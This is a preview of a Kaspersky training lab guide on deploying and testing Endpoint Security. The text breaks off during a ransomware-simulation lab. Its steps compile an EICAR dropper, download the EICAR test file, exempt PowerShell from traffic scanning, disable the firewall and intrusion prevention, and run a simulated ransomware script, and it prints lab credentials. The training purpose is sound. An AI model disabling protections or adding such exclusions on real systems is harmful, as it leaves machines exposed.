Esta é uma pré-visualização de arquivo. Entre para ver o arquivo original
Kaspersky Technical Training Kaspersky Endpoint Security and Management Lab Guide KL 002.11.1 Kaspersky Lab www.kaspersky.com Table of contents Lab 1. How to install Kaspersky Security Center ......................................................................................................... 3 Task A: Install the Kaspersky Security Center Administration Server ................................................................... 3 Task B: Install the Web console of Kaspersky Security Center .............................................................................. 7 Task C: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server ............................................................................................................................................................................. 10 Lab 2. How to deploy Kaspersky Endpoint Security .................................................................................................. 17 Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server .......................................................................................................................................... 18 Task B: Create a standalone installation package for Kaspersky Endpoint Security .......................................... 22 Task C: Install a standalone package of Kaspersky Endpoint Security for Windows on a notebook .................. 24 Task D: Study the results of deploying protection in the network ........................................................................ 25 Lab 3. How to create a structure for the managed computers ..................................................................................... 26 Task A: Create groups for workstations, notebooks, and servers ........................................................................ 26 Task B: Move computers into groups by rules ..................................................................................................... 28 Lab 4. How to test File Threat Protection ................................................................................................................... 34 Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux .................................................................................................................................................................... 34 Lab 5. How to configure Mail Threat Protection ........................................................................................................ 36 Task A: Send a message with an executable file .................................................................................................. 36 Task B: Edit the attachment filter ........................................................................................................................ 37 Task C: Make sure that Mail Threat Protection does not edit attachments anymore .......................................... 39 Lab 6. How to test Web Threat Protection .................................................................................................................. 41 Task A: Make sure that Web Threat Protection scans https traffic by default ..................................................... 41 Task B: Turn off encrypted traffic scanning for the PowerShell application ....................................................... 41 Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https ..................................................................................................................................................... 43 Lab 7. How to test protection of network folders against ransomware ....................................................................... 44 Task A: Simulate a ransomware infection ............................................................................................................ 44 Task B: Check how the Behavior Detection component reacted on the Tom-Laptop machine ............................ 48 Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices 49 Task D: Make sure that exclusions for trusted network devices work correctly .................................................. 50 Lab 8. How to check health of Exploit Prevention ..................................................................................................... 51 Task A: Simulate a hacker attack by exploiting a vulnerability in PowerShell and get access to a remote computer ............................................................................................................................................................................. 51 Task B: Disable most of the protection components ............................................................................................ 54 Task C: Test protection against exploits .............................................................................................................. 55 Lab 9. How to test protection against fileless threats .................................................................................................. 56 Make sure that AMSI detects fileless threats........................................................................................................ 57 Lab 10. Improve workstations’ protection against ransomware ................................................................................. 58 Task A: Simulate a ransomware infection ............................................................................................................ 58 Task B: Prohibit all programs except for trusted from editing and deleting documents ..................................... 59 Task C: Configure Host Intrusion Prevention events to be stored on the Administration Server ........................ 63 Task D: Simulate encrypting a document and check the result ............................................................................ 66 Lab 11. How to test Network Threat Protection ......................................................................................................... 67 Task A: Imitate a network attack from Kali on Alex-Desktop .............................................................................. 67 Task B: Study the Network attack report ............................................................................................................. 68 Task C: Unblock the Kali computer ..................................................................................................................... 71 Task D: Configure exclusions in the properties of Network Threat Protection ................................................... 73 Task E: Imitate an attack from Kali on Alex-Desktop and study the results ........................................................ 74 L–2 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Lab 12. How to configure exclusions from self-defense ............................................................................................. 75 Task A: Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance ............................... 75 Task B: Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security ................................. 79 Task C: Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session ......... 80 Lab 13. How to configure password protection .......................................................................................................... 81 Task A: Find a computer where protection is off ................................................................................................. 81 Task B: Protect Kaspersky Endpoint Security with a password ........................................................................... 82 Task C: Make sure that Kaspersky Endpoint Security is password-protected ..................................................... 85 Task D: Set a password for Network Agent uninstallation ................................................................................... 86 Lab 14. How to configure Application Control .......................................................................................................... 88 Task A: Create a category for all web browsers except Internet Explorer .......................................................... 89 Task B: Prohibit the users from starting any browsers except for Internet Explorer........................................... 91 Task C: Start Mozilla Firefox and Internet Explorer ........................................................................................... 93 Lab 15. How to block start of unknown applications in the network .......................................................................... 95 Task A: Create an application category that prohibits starting unknown files .................................................... 95 Task B: Change the policy so as to prohibit all users from starting unknown files ............................................. 98 Task C: Make sure that the settings work correctly ........................................................................................... 100 Lab 16. How to block USB flash drives.................................................................................................................... 102 Task A: Configure blocking USB flash drives .................................................................................................... 102 Task B: Test blocking USB flash drives ............................................................................................................. 105 Task C: Receive a request from the user ............................................................................................................ 106 Lab 17. How to configure granular permissions for USB flash drives ..................................................................... 107 Task A: Prohibit all users from writing files to USB flash drives ...................................................................... 107 Task B: Allow domain users to write files to trusted USB flash drives .............................................................. 110 Lab 18. How to configure web access control .......................................................................................................... 115 Task A: Create a rule to block access to cryptocurrency exchange websites..................................................... 116 Task B: Test whether access to cryptocurrency exchange websites is blocked .................................................. 119 Task C: Consult reports in Kaspersky Security Center ...................................................................................... 120 Lab 19. How to configure Adaptive Anomaly Control ............................................................................................. 121 Task A: Configure blocking macros and scripts in office documents ................................................................. 121 Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro ................................................. 123 Task C: Configure Exploit Prevention to block malicious macros .................................................................... 125 Lab 20. How to configure the dashboard .................................................................................................................. 129 Task A: Add new widgets to the dashboard ........................................................................................................ 130 Task B: Delete and rearrange widgets ............................................................................................................... 132 Lab 21. How to configure maintenance tools............................................................................................................ 134 Task A: Delete unnecessary reports ................................................................................................................... 134 Task B: Create a weekly report about infected computers ................................................................................. 135 Task C: Configure the most important reports to be emailed ............................................................................ 137 Lab 22. How to collect diagnostic information ......................................................................................................... 140 Task A: Collect trace logs from a computer ....................................................................................................... 140 L–3 Lab 1. How to install Kaspersky Security Center Lab 1. How to install Kaspersky Security Center Scenario. You need to protect less than 100 computers at ABC Inc. with Kaspersky Endpoint Security for Business. One Administration Server and the Express edition of Microsoft SQL Server are enough for managing protection within such a network. Install Kaspersky Security Center Administration Server on a dedicated computer running Windows Server 2016. Microsoft SQL server has been installed on the virtual machine beforehand. Contents. In this lab, we will: 1. Install the Kaspersky Security Center Administration Server 2. Install the Web console of Kaspersky Security Center 3. Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server Task A: Install the Kaspersky Security Center Administration Server Install Kaspersky Security Center Administration Server with the default settings. The task is performed on Security-Center. The DC computer must be turned on. 1. Start the Kaspersky Security Center installer (it is on the desktop) 2. On the welcome page of the wizard, click Next 3. On the following page, make sure that the required version of .NET Framework is installed and click Next L–4 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 4. Accept the License Agreement and the Privacy Policy 5. Click Next 6. Select the Standard installation type and click Next 7. Clear the checkbox Install Kaspersky Security Center 11 Web Console. We will install the web console later using its own installation wizard L–5 Lab 1. How to install Kaspersky Security Center 8. Keep the option Fewer than 100 networked devices selected and click Next 9. Select Microsoft SQL Server and click Next 10. Click Browse L–6 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 11. Select the SECURITY-CENTER\SQLEXPRESS server and click OK 12. To proceed with the installation of Kaspersky Security Center, click Next 13. Select Microsoft Windows Authentication Mode and click Next L–7 Lab 1. How to install Kaspersky Security Center 14. To start the installation, click Install 15. Do not select to start the Administration Console and click Finish to close the wizard Task B: Install the Web console of Kaspersky Security Center Kaspersky Security Center 11 features a new management Web Console. It is implemented as an independent component that has a separate distribution. The task is performed on Security-Center. The DC computer must be turned on. 16. Start the Kaspersky Security Center Web Console installer (ask the instructor where the distribution is located) 17. Select a language for the installation wizard L–8 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 18. On the welcome page of the wizard, click Next 19. Accept the License Agreement and click Next 20. Do not change the destination folder 21. Click Next 22. Specify the connection address: 127.0.0.1 23. Do not change the port 24. Click Test L–9 Lab 1. How to install Kaspersky Security Center 25. Make sure that port 8080 is accessible at 127.0.0.1 26. Click OK and Next 27. Leave these settings unchanged 28. Click Next 29. Select the option Generate new certificate 30. Click Next 31. Make sure that SECURITY-CENTER is specified in the list of trusted Administration Servers 32. Click Next to proceed with the installation L–10 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 33. To start the installation, click Install 34. Close the Kaspersky Security Center 11 Web Console Setup Wizard: Click Finish Task C: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server Connect to the Administration Server using Kaspersky Security Center Web Console and proceed through the Quick Start Wizard. Add an activation code. Configure notifications to administrator@abc.lab via SMTP server 10.28.0.10. Accept the KSN agreement. Download signature updates. Do not start the Remote Installation Wizard. Enable automatic distribution for the license. mailto:administrator@abc.lab L–11 Lab 1. How to install Kaspersky Security Center The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 35. Start the Google Chrome browser. In the address bar, type https://127.0.0.1:8080 36. Click Advanced 37. Click the link Proceed to 127.0.0.1 (unsafe) 38. Enter the username abc\administrator and password Ka5per5Ky 39. Click the Login button 40. Skip the tutorial. Click X to close it https://127.0.0.1:8080/ L–12 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 41. On the welcome page of the wizard, click Next 42. We will not use a proxy server. Click Next 43. Do not wait for the wizard to download updates, click Next L–13 Lab 1. How to install Kaspersky Security Center 44. To activate the application, select Add activation code 45. Ask the trainer where to find the activation code 46. Enter the activation code in the field 47. Click Send 48. Make sure that 3 keys have been added to the repository 49. Click Next 50. Click Add to install the management plugin of Kaspersky Endpoint Security 11.1 L–14 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 51. Select the English KSC Web Console Plug-in for KES Windows 52. Click Install Plug-in 53. Make sure that the plugin of Kaspersky Endpoint Security 11.1 has been successfully added to the list 54. Click OK L–15 Lab 1. How to install Kaspersky Security Center 55. Click Next 56. Accept the KSN statement: Select I agree to use Kaspersky Security Network and click Next 57. Click Create 58. Wait for the Quick Start Wizard to create prime policies and tasks L–16 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 59. If the Network poll page appears, click Next 60. Specify the addressee for email notifications: In the Email address box, enter administrator@abc.lab, and for the SMTP server, type 10.28.0.10 61. Click the button Send test message to check whether the settings are correct 62. Make sure that there is no error message and click Next 63. Clear the Start Protection Deployment Wizard check box and click Finish L–17 Lab 2. How to deploy Kaspersky Endpoint Security 64. Switch to Operations | Licensing 65. Select the key for workstations and servers 66. Click the license name to open the key properties 67. Select to Deploy key automatically 68. Click Save Conclusion You installed the Administration Server, Kaspersky Security Center Web Console, and plugin for Kaspersky Endpoint Security. Also, you completed the Quick Start Wizard: Created the default tasks and policies, accepted the KSN agreement, configured notifications for the administrator, and enabled autodistribution for the key. Further labs will teach you how to install Kaspersky Endpoint Security and Network Agent. Lab 2. How to deploy Kaspersky Endpoint Security Scenario. You need to install Kaspersky Endpoint Security on the network computers. You have installed the Kaspersky Security Center Administration Server already. Now, use the Remote Installation Wizard to install Kaspersky Endpoint Security and Network Agent on the computers discovered by the Administration Server. Contents. In this lab, we will: 1. Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server 2. Install Kaspersky Endpoint Security for Windows using a standalone package on a notebook 3. Study the installation results L–18 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server Run the Remote Installation Wizard and select the Kaspersky Endpoint Security package. To be able to access the computers, specify the domain administrator account ABC\Administrator and password Ka5per5Ky. Leave the other settings unchanged. Wait for the task to install the applications. If the task prompts you to restart a computer, act as a user and restart it. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 1. Switch to Discovery & Deployment 2. On the Deployment & Assignment drop-down menu, select Protection Deployment Wizard 3. Select Kaspersky Endpoint Security for Windows (11.0.0) in the list of installation packages 4. Click Next 5. Select Do not add key to installation package 6. Click Next 7. Select Kaspersky Security Center 11 Network Agent 8. Click Next L–19 Lab 2. How to deploy Kaspersky Endpoint Security 9. Choose Select devices for installation 10. Expand the Managed devices list. Find and select the Security Center computer 11. Expand the Unassigned devices list. Find and select the Alex-Desktop computer 12. Without changing the package copying parameters, click Next 13. Click Next without changing the restart parameters L–20 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 14. Agree to uninstall incompatible applications and click Next 15. Select to move computers to the Managed devices group after the installation and click Next 16. To specify the name and password of an administrator, select Account required (installation without Network Agent) 17. To specify an account, click Add 18. Type the abc\administrator username, Ka5per5Ky password, and click OK 19. Make sure that the abc\administrator account has been added and click Next L–21 Lab 2. How to deploy Kaspersky Endpoint Security 20. Select the check box Run the task when the Wizard completes 21. Click OK 22. Open the Devices | Tasks tab 23. Select the Remote installation of Kaspersky Endpoint Security for Windows task 24. To consult its progress, click Result 25. Make sure that the task is running on two computers 26. Wait for the notification that the computers have to be restarted to complete the task successfully 27. Switch to Alex-Desktop 28. Log on to the abc\Alex account, password Ka5per5Ky 29. Restart the computer: Click the Restart button in the message window 30. After it boots, log on to the abc\Alex account with the password Ka5per5Ky L–22 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 31. To complete the Kaspersky Endpoint Security installation on the Security-Center server, restart the machine. 32. When the computer starts again, log on to the abc\Administrator account with the password Ka5per5Ky Task B: Create a standalone installation package for Kaspersky Endpoint Security Open the list of installation packages. Select the Kaspersky Endpoint Security package. Start the standalone package creation wizard. Add the Network Agent to the installation package and select the group into which the target computers are to be moved after the installation. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 33. Log on to the abc\Administrator account with the password Ka5per5Ky 34. Run the MMC Administration Console 35. Expand the Advanced | Remote installation node 36. Select the Installation packages node 37. Select the installation package Kaspersky Endpoint Security for Windows (11.1.0) 38. In the right pane, click the link Create stand- alone installation package L–23 Lab 2. How to deploy Kaspersky Endpoint Security 39. Agree to install Kaspersky Security Center 11 Network Agent together with Kaspersky Endpoint Security: Click Next 40. Agree to move protected computers to the Managed devices group: Click Next 41. Wait for the wizard to create the package 42. Pay attention to the package file path, you will need it in the next task. Click Next L–24 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 43. Click Finish to close the wizard Task C: Install a standalone package of Kaspersky Endpoint Security for Windows on a notebook From the client computer, open the KLSHARE folder on the Administration Server. Find and run the standalone package. The task is performed on Tom-Laptop. The DC, Security-Center, and Alex-Desktop machines must be powered on. 44. On the Tom-Laptop machine, start Windows Explorer 45. Open the shared folder \\security- center\klshare\PkgInst\ 46. Open the folder of the standalone package that you created in the first task 47. Copy the installer.exe file to the desktop and start it 48. In the User Account Control window, confirm running the file with administrative privileges: Click Yes file://///security-center/klshare file://///security-center/klshare L–25 Lab 2. How to deploy Kaspersky Endpoint Security 49. Start the installation: Click the respective button 50. Wait for the installation to complete and click Close to exit the results window Task D: Study the results of deploying protection in the network Study the results of the installation task. Make sure that the computers have been moved to the Managed devices group. Make sure that Network Agent 11 and Kaspersky Endpoint Security 11.1 are installed on the computers. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 51. Open Kaspersky Security Center Web Console 52. Switch to the Monitoring & Reporting | Reports tab 53. Find the Deployment reports 54. Select the Kaspersky Lab software version report 55. Click Show report L–26 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 56. Make sure that it displays three instances of Kaspersky Endpoint Security and three instances of Network Agent, exactly the same number as there are network computers 57. Close the report Conclusion You have installed Kaspersky Endpoint Security and Network Agent using the remote installation wizard and a standalone package. If an antivirus by another manufacturer is installed on a computer, the installer will uninstall it and prompt to restart the machine. If a firewall is running on a computer or you haven’t specified an account that has administrative permissions on the target machines, the installation will return an error. Lab 3. How to create a structure for the managed computers Scenario. You have installed protection on the network computers and you want to configure it optimally. Assuming that servers, desktops, and laptops need different settings, create respective groups for them and move the computers there. To save effort in hand-moving the computers into their appropriate groups, create relocation rules and configure conditions based on the operating systems and network parameters of the computers. Contents. In this lab, we will: 1. Create groups for workstations, notebooks, and servers 2. Move computers into the groups using rules Task A: Create groups for workstations, notebooks, and servers Create Servers and Workstations subgroups in the Managed devices container. Then create Desktops and Laptops subgroups within the Workstations group. L–27 Lab 3. How to create a structure for the managed computers The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 1. Open the Devices | Edit groups tab 2. Select the group Managed devices 3. To create a subgroup, click Add 4. Type Servers for the group name and click Add 5. Select the Managed devices group 6. To create a subgroup, click Add 7. Create another subgroup named Workstations L–28 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 8. Select the Workstations group and click Add 9. Type Desktops for the group name 10. Repeat steps 8,9 to create the Laptops group Task B: Move computers into groups by rules Open the list of rules in the properties of the Unassigned devices node. Create a rule for all computers. It will work permanently and move servers to the Servers group. Use the Network agent is running condition and the Operating system version condition with the Windows Server 2012 R2 and Windows Server 2016 values. You can find both conditions on the Applications tab. Create similar rules that will move computers to the Desktops and Laptops groups respectively. Instead of the Operating system version, use the IP Range condition available on the Network tab. For desktop computers, specify range 10.28.0.100– 10.28.0.199; and for notebooks, 10.28.0.200–10.28.0.254. The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. L–29 Lab 3. How to create a structure for the managed computers 11. Switch to Discovery & Deployment 12. On the Deployment & Assignment drop-down menu, select Moving rules 13. Click Add 14. Type Servers for the rule name 15. Specify the destination group: On the drop- down list, select the Managed devices | Servers subgroup 16. Select the Rule applied continuously option 17. To apply the rule to all computers, clear the checkbox Move only devices that do not belong to an administration group 18. Select the Enable rule check box L–30 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 19. Open the Rule conditions tab 20. Switch to the Applications tab 21. Specify that the Network Agent is installed: On the respective drop-down list, select Yes 22. Apply the rule to computers with server operating systems: Enable the Operating system version parameter 23. Scroll the list to the bottom and switch to the second page 24. Under Operating system version, select Microsoft Windows 2012 R2 and Microsoft Windows Server 2016 25. To save the rule, click Save 26. Click Add to create a rule for desktops L–31 Lab 3. How to create a structure for the managed computers 27. Type Desktops for the rule name 28. Specify the destination group: On the drop- down list, select the Managed devices | Workstations | Desktops subgroup 29. Select the Rule applied continuously option 30. To apply the rule to all computers, clear the checkbox Move only devices that do not belong to an administration group 31. Select the Enable rule check box 32. Open the Rule conditions tab 33. Configure conditions for IP addresses: Switch to the Network tab 34. Apply the rule to the computers whose addresses belong to a specific interval: Select the IP range check box 35. Specify IP range 10.28.0.100— 10.28.0.199 36. Switch to the Applications tab 37. Specify that the Network Agent is installed: On the respective drop-down list, select Yes 38. To save the rule, click Save L–32 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 39. Click Add to create a rule for notebooks 40. Type Laptops for the rule name 41. Specify the destination group: On the drop- down list, select the Managed devices | Workstations | Laptops subgroup 42. Select the Rule applied continuously option 43. Clear the check box Move only devices that do not belong to an administration group 44. Select the Enable rule check box 45. Open the Rule conditions tab 46. Switch to the Network tab 47. Select the IP range check box 48. Specify IP range 10.28.0.200— 10.28.0.254 L–33 Lab 3. How to create a structure for the managed computers 49. Switch to the Applications tab 50. Specify that the Network Agent is installed: On the respective drop-down list, select Yes 51. To save the rule, click Save 52. Make sure that there are five relocation rules in the list: Two have been created automatically for installation packages, and three by you 53. Click Devices | Managed devices 54. Click Devices | Groups 55. (Optional) Pin the group structure 56. On the group structure tree, expand Security Center | Managed devices and select Servers 57. Open the properties of the Security-Center device L–34 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 58. Make sure that the Security-Center computer, which is running Windows Server 2016 operating system, has been automatically moved to the Servers group 59. In a similar manner, make sure that the other computers have been moved to their respective groups Conclusion You installed protection and organized the computers into groups. The default settings are optimized for an average user of Kaspersky Endpoint Security. They reliably protect computers, and minimize the performance impact. You can adjust the protection-comfort balance as necessary: Reinforce protection in some aspects, and maybe make concessions in some others aiming to improve the user experience. Further labs will explain how to fine-tune the protection settings. Lab 4. How to test File Threat Protection Scenario. You installed Kaspersky Endpoint Security on the network computers. By default, Kaspersky Endpoint Security supports Windows Subsystem for Linux: It is a compatibility layer for running Linux applications in the latest versions of Microsoft Windows. In our environment, Windows Subsystem for Linux is based on Ubuntu Linux 14.04. The administrator is to start a test malicious file in Windows Subsystem for Linux and make sure that Kaspersky Endpoint Security 11.1 detects and deletes it. Contents. In this lab, we will: 1. Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux 2. Consult the File Threat Protection events Make sure that Kaspersky Endpoint Security can detect malicious files that run within Windows Subsystem for Linux In this task, we will try to compile a loader for eicar.com within Windows Subsystem for Linux that is running under Windows 10. L–35 Lab 4. How to test File Threat Protection The task is performed on Tom-Laptop. The DC and Security-Center machines must be powered on. 1. Press WIN+R 2. Type wsl 3. Click OK 4. Copy the eicar dropper’s source code to the /tmp: folder cp /mnt/c/temp/eicar_drop_kl_edu.cpp /tmp/ 5. Go to the /tmp: directory cd /tmp/ 6. Compile the eicar dropper using the g++ compiler: g++ eicar_drop_kl_edu.cpp -o eicar_dropper 7. Run the compiled eicar dropper: ./eicar_dropper 8. Click Kaspersky Endpoint Security icon in the notification area or on the Start menu to open Kaspersky Endpoint Security interface 9. Click Reports in the lower-left corner L–36 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 10. Select the File Threat Protection report 11. Find the threat detection event 12. Find the results of processing this threat Conclusion This lab demonstrates how Kaspersky Endpoint Security can detect malicious files that are saved or created within Windows Subsystem for Linux. Lab 5. How to configure Mail Threat Protection Scenario. Your network computers are protected with Kaspersky Endpoint Security. When an administrator emails an executable file to a user who is to run it and thus solve an issue, Kaspersky Endpoint Security renames the attachment. To save time and avoid explaining the users how to rename them back, configure Mail Threat Protection not to rename files. At the same time, criminals often use files with double extension to trick users into running a malicious executable disguised as a document. Contents. In this lab, configure Mail Threat Protection not to rename attached *.exe files, but rename files with double extension *.pdf.exe. 1. Send a message with an executable file 2. Edit the attachment filter 3. Make sure that Mail Threat Protection does not edit attachments anymore Task A: Send a message with an executable file Send a message to tom@abc.lab with a zipped *.pdf.exe file attached. Receive the message and make sure that Mail Threat Protection has changed the extension of the archived file. mailto:tom@abc.lab L–37 Lab 5. How to configure Mail Threat Protection The task is performed on Alex-Desktop. The DC and Security-Center machines must be powered on. 1. Begin the task on Alex-Desktop. 2. Create a new message: — Specify the addressee. In the To: field, type Tom@abc.lab — In the Subject: box, type Weekly report — Attach the Document1.zip file to the message (ask the trainer where it is located) 3. Click Send to dispatch the message Switch to Tom-Laptop 4. Run Microsoft Outlook. Select the received message 5. Save the Document1.zip file to the desktop 6. Unpack the Document1.zip archive (select the Extract all command on the file’s shortcut menu) 7. Note that the archived file is named Document1.pdf.ex_. Mail Threat Protection has changed the extension of the archived executable file Task B: Edit the attachment filter In Kaspersky Endpoint Security policy, edit the list of attachment formats that Mail Threat Protection deletes. L–38 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 8. Open Kaspersky Security Center Web Console 9. Go to Devices | Policies & Profiles 10. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 11. Switch to the Application Settings tab 12. Open the Essential Threat Protection section 13. Open the Mail Threat Protection settings 14. Reconfigure attachment filtering. Choose Delete attachments of selected types L–39 Lab 5. How to configure Mail Threat Protection 15. Scroll the list of settings down 16. Disable processing *.exe 17. Create a new attachment filter: Click Add 18. In the Extension field, type *.pdf.exe 19. Click OK 20. Make sure that the *.pdf.exe attachment filter is displayed in the list 21. Click OK 22. Click Save to save the policy 23. Wait for the policy to be enforced Task C: Make sure that Mail Threat Protection does not edit attachments anymore L–40 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 The task is performed on Alex-Desktop. The DC, Security-Center, and Tom-Laptop machines must be powered on. 24. On the Alex-Desktop machine, create another message. Attach the Procmon.zip file (ask the instructor where this file is located) 25. In the Subject: box, type IT Service Desk 26. Click Send Switch to Tom-Laptop 27. Open Microsoft Outlook 28. Save the Procmon.zip file to the desktop 29. Unpack the Procmon.zip archive (select the Extract all command on the file’s shortcut menu) 30. Note that in the new message, the archived file is named Procmon.exe; Mail Threat Protection has not renamed it Conclusion You have configured Mail Threat Protection not to rename .exe files. If the network is being attacked through email by a new virus that has not yet been added to either signature database or KSN, configure Mail Threat Protection to rename or delete all executable attachments. L–41 Lab 6. How to test Web Threat Protection Lab 6. How to test Web Threat Protection Scenario. Kaspersky Endpoint Security can scan https traffic under the default settings. It replaces the certificate for this purpose, which sometimes may affect banking and other software that uses a certificate of its own. To avoid interaction issues, Kaspersky Endpoint Security permits excluding encrypted traffic from scanning. Contents. In this lab, we will: 1. Make sure that Web Threat Protection scans https traffic under the default settings 2. Turn off encrypted traffic scanning for the PowerShell application 3. Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https Task A: Make sure that Web Threat Protection scans https traffic by default Run PowerShell, try to download the eicar_com.zip file, and check how Kaspersky Endpoint Security will react. The task is performed on Tom-Laptop. The DC and Security-Center machines must be powered on. 1. Press WIN+R 2. Type powershell 3. Click OK 4. Download the eicar_com.zip file via PowerShell over https. Carry out the following command: Invoke-WebRequest –uri “https://secure.eicar.org/eicar_com.zip” -OutFile “C:\temp\eicar_com.zip” 5. Make sure that Kaspersky Endpoint Security has blocked the download. Do not close the PowerShell window Task B: Turn off encrypted traffic scanning for the PowerShell application Add PowerShell to the list of trusted applications, try to download the eicar_com.zip file, and check how Kaspersky Endpoint Security will react. https://secure.eicar.org/eicar_com.zip L–42 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 The task is performed on Security-Center. The DC and Tom-Laptop machines must be powered on. 6. Open Kaspersky Security Center Web Console 7. Go to Devices | Policies & Profiles 8. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 9. Switch to the Application Settings tab 10. Open the General Settings section 11. Open Exclusions 12. To add a trusted application, click the link Trusted applications in the lower-left corner of the window 13. Click Add L–43 Lab 6. How to test Web Threat Protection 14. For the application path, type %systemroot%\system32\ WindowsPowershell\v1.0\ powershell.exe 15. Clear the following checkboxes: Do not scan opened files Do not inherit restrictions of the parent process (application) 16. Select Do not scan network traffic | Encrypted traffic only 17. Click OK three times to save the exclusion 18. Click Save to save the policy 19. Confirm that you want to use the specified settings: Click Yes 20. Wait for the policy to be enforced Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https Download the eicar_com.zip file from the www.eicar.org website through the PowerShell application once again. Make sure that Web Threat Protection will not block the test virus if it is downloaded via a trusted application. The task is performed on Tom-Laptop. The machines DC and Security-Center must be powered on. 21. Download eicar_com.zip over the https secure protocol one more time. Carry out the following command: Invoke-WebRequest –uri https://secure.eicar.org/eicar_com.zip -OutFile “C:\temp\eicar_com.zip” http://www.eicar.org/ https://secure.eicar.org/eicar_com.zip L–44 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 22. To make sure that the file has been saved successfully, open the C:\temp\ directory 23. Close the PowerShell window Conclusion This lab demonstrates how to add an application to the trust list and prevent scanning its encrypted traffic. The option Do not scan network traffic configured for trusted programs applies to the Mail Threat Protection, Web Threat Protection, and Web Control components, and does not influence the Firewall or Network Threat Protection. Lab 7. How to test protection of network folders against ransomware Scenario. Your network computers are protected with Kaspersky Endpoint Security and managed via Kaspersky Security Center. Of all threats, you are most concerned about ransomware that encrypts data in shared folders. If Kaspersky Endpoint Security fails to detect a new malware version one day, the company will lose much money. You want to use the Behavior Detection protection component to counter ransomware. Contents. In this lab, we will: 1. Simulate a ransomware infection 2. Check how the Behavior Detection protection component reacted 3. Allow encryption within network shared folders and configure exclusions for network devices 4. Make sure that exclusions for network devices work correctly Task A: Simulate a ransomware infection Find the ransomware2.bat script on the desktop of the Alex-Desktop computer and run it. It imitates ransomware: Encrypts files in shared network folders and deletes the originals. Make sure that Kaspersky Endpoint Security 11.1 restored the invoice.txt file and the Alex user cannot modify files in the network shared folder anymore. L–45 Lab 7. How to test protection of network folders against ransomware The task is performed on Security-Center. The DC, Alex-Desktop, and Tom-Laptop machines must be powered on. 1. Open Kaspersky Security Center Web Console 2. Go to Devices | Policies & Profiles 3. Open the policy Kaspersky Endpoint Security for Windows (11.1.0) 4. Switch to the Application Settings tab 5. In Advanced Threat Protection, select Host Intrusion Prevention 6. Disable Host Intrusion Prevention 7. Click OK L–46 KASPERSKY LAB™ KL 002.11.1: Kaspersky Security Center 11 and Kaspersky Endpoint Security 11.1 8. In Essential Threat Protection, select Firewall 9. Disable the Firewall 10. Click OK 11. Save the settings: Click Save 12. Confirm that you want to use the specified settings: Click Yes 13. Wait for the policy to be enforced 14. !Restart the Tom- Laptop computer Switch to the Alex-Desktop machine. L–47 Lab 7. How to test protection of network folders against ransomware 15. Open the shared folder \\tom-laptop\temp 16. Make sure that the invoice.txt file is there 17. Find the ransomware2.bat file on the desktop. It imitates actions of file encrypting ransomware 18. Run the ransomware2.bat file 19. Consult the contents of the folder \\tom- laptop\temp 20. Open the invoice.txt.aes file in Notepad 